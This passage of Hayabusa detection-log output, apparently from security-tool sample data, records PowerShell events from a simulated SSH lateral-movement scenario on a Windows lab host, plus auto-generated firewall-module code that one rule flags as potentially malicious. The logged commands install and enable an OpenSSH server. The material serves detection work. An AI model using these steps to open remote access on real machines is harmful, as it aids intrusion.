value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppPackageDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.627 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""*"" ParameterBinding(Export-ModuleMember): name=""Cmdlet""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:16.478 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:16.480 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:37.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:04:37.671 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:19:29.476 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:29.479 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-Service sshd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:30.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:30.036 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:30.039 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:30.041 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.548 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.559 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.593 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:32.595 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:36.172 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:36.183 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = 